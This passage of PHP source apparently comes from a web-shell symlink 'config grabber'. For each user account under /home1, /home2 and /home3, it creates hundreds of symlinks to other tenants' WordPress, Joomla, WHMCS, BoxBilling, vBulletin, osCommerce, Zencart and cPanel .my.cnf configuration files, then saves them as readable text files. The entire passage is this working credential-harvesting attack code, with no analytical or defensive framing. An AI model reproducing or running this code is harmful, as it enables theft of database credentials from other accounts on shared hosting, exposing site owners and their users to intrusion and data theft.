  1060. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1061. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1062. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1063. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1064. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1065. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1066. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1067. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1068. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1069. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1070. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1071. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1072. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1073. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1074. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1075. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1076. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1077. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1078. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1079. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1080. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1081. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1082. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1083. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1084. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1085. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1086. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1087. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1088. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1089. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1090. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1091. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1092. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1093. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1094. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1095. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1096. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1097. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1098. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1099. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1100. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1101. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1102. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1103. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1104. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1105. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1106. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1107. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1108. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1109. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1110. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1111. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1112. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1113. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1114. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1115. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1116. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1117. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1118. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1119. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1120. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1121. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1122. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1123. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1124. @symlink('/home1/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1125. @symlink('/home1/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1126. //Home2
  1127.  
  1128. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1129. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1130. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1131. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1132. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1133. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1134. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1135. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1136. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1137. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1138. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1139. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1140. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1141. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1142. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1143. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1144. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1145. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1146. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1147. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1148. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1149. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1150. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1151. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1152. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1153. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1154. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1155. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1156. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1157. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1158. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1159. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1160. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1161. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1162. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1163. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1164. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1165. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1166. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1167. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1168. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1169. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1170. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1171. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1172. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1173. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1174. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1175. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1176. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1177. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1178. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1179. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1180. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1181. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1182. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1183. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1184. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1185. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1186. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1187. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1188. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1189. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1190. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1191. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1192. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1193. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1194. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1195. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1196. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1197. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1198. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1199. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1200. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1201. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1202. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1203. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1204. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1205. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1206. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1207. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1208. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1209. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1210. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1211. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1212. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1213. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1214. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1215. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1216. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1217. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1218. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1219. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1220. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1221. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1222. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1223. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1224. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1225. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1226. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1227. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1228. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1229. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1230. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1231. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1232. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1233. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1234. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1235. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1236. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1237. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1238. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1239. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1240. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1241. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1242. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1243. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1244. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1245. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1246. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1247. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1248. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1249. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1250. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1251. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1252. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1253. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1254. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1255. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1256. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1257. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1258. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1259. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1260. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1261. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1262. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1263. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1264. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1265. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1266. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1267. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1268. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1269. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1270. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1271. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1272. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1273. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1274. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1275. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1276. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1277. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1278. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1279. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1280. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1281. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1282. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1283. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1284. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1285. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1286. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1287. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1288. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1289. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1290. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1291. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1292. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1293. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1294. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1295. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1296. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1297. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1298. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1299. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1300. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1301. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1302. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1303. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1304. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1305. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1306. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1307. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1308. @symlink('/home2/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1309. @symlink('/home2/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1310. //Home3
  1311.  
  1312. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1313. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1314. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1315. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1316. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1317. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1318. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1319. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1320. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1321. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1322. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1323. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1324. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1325. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1326. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1327. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1328. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1329. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1330. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1331. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1332. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1333. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1334. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1335. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1336. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1337. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1338. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1339. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1340. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1341. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1342. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1343. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1344. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1345. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1346. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1347. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1348. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1349. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1350. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1351. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1352. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1353. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1354. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1355. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1356. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1357. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1358. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1359. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1360. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1361. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1362. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1363. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1364. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1365. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1366. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
